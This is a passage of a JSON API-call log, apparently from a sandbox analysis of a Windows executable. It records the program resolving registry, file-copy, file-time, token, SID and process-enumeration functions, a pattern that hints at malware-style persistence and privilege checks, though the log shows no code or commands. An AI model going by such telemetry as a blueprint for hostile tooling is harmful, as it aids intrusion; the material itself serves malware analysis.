}, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 631 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004075fd", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetSystemDirectoryA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75878480" } ], "repeated": 0, "id": 632 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407611", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 633 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407614", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetSystemDirectoryW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75881350" } ], "repeated": 0, "id": 634 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407622", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 635 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407625", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SetFileAttributesW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758837a0" } ], "repeated": 0, "id": 636 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407636", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 637 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407639", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "MoveFileExW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758799b0" } ], "repeated": 0, "id": 638 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x0040764f", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x75c40000" } ], "repeated": 0, "id": 639 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407652", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "shell32.dll" }, { "name": "ModuleHandle", "value": "0x75c40000" }, { "name": "FunctionName", "value": "SHGetSpecialFolderPathW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75db1050" } ], "repeated": 0, "id": 640 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407668", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x75c40000" } ], "repeated": 0, "id": 641 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x0040766b", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "shell32.dll" }, { "name": "ModuleHandle", "value": "0x75c40000" }, { "name": "FunctionName", "value": "SHGetSpecialFolderPathA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75ef7850" } ], "repeated": 0, "id": 642 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x0040767e", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 643 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407681", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegOpenKeyExA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecf120" } ], "repeated": 0, "id": 644 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407691", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 645 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407694", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegOpenKeyExW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76eceec0" } ], "repeated": 0, "id": 646 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004076a1", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 647 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004076a4", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegQueryValueExA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecef60" } ], "repeated": 0, "id": 648 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004076b7", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 649 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004076ba", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegQueryValueExW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecedf0" } ], "repeated": 0, "id": 650 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004076c7", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 651 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004076ca", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegSetValueExA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ed05d0" } ], "repeated": 0, "id": 652 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004076d7", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 653 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004076da", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegSetValueExW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecf100" } ], "repeated": 0, "id": 654 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004076e7", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 655 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004076ea", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegCloseKey" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecf030" } ], "repeated": 0, "id": 656 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004076fb", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 657 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004076fe", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateDirectoryW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883380" } ], "repeated": 0, "id": 658 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x0040770c", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 659 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x0040770f", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Sleep" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758811a0" } ], "repeated": 0, "id": 660 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407720", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 661 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407723", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetFileTime" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758835f0" } ], "repeated": 0, "id": 662 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407731", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 663 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407734", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SetFileTime" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758837e0" } ], "repeated": 0, "id": 664 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407742", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 665 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407745", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CopyFileW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883a50" } ], "repeated": 0, "id": 666 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407759", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 667 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x0040775c", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "DeleteFileW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758833e0" } ], "repeated": 0, "id": 668 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407770", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 669 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407773", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "ExitProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75886a10" } ], "repeated": 0, "id": 670 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407781", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 671 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407784", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "VirtualAlloc" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587f660" } ], "repeated": 0, "id": 672 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407798", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 673 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x0040779b", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetTickCount" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75882640" } ], "repeated": 0, "id": 674 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004077ae", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 675 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004077b1", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetCurrentProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758830f0" } ], "repeated": 0, "id": 676 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004077be", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 677 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004077c1", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GlobalAlloc" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880890" } ], "repeated": 0, "id": 678 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004077ce", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 679 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004077d1", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "OpenProcessToken" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecef40" } ], "repeated": 0, "id": 680 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004077e4", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 681 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004077e7", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "GetTokenInformation" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76eceba0" } ], "repeated": 0, "id": 682 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004077fa", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 683 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004077fd", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "AllocateAndInitializeSid" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecf4a0" } ], "repeated": 0, "id": 684 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407810", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 685 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407813", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "EqualSid" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ed07e0" } ], "repeated": 0, "id": 686 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407826", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 687 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407829", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "LookupAccountSidA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ef8100" } ], "repeated": 0, "id": 688 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x0040783c", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 689 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x0040783f", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CloseHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883150" } ], "repeated": 0, "id": 690 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x0040784c", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 691 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x0040784f", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetCurrentProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758830f0" } ], "repeated": 0, "id": 692 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407862", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 693 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407865", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GlobalAlloc" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880890" } ], "repeated": 0, "id": 694 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407878", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 695 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x0040787b", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CloseHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883150" } ], "repeated": 0, "id": 696 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x0040788c", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 697 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x0040788f", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateToolhelp32Snapshot" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75886a30" } ], "repeated": 0, "id": 698 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004078a3", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 699 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004078a6", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Process32First" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758791e0" } ], "repeated": 0, "id": 700 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", 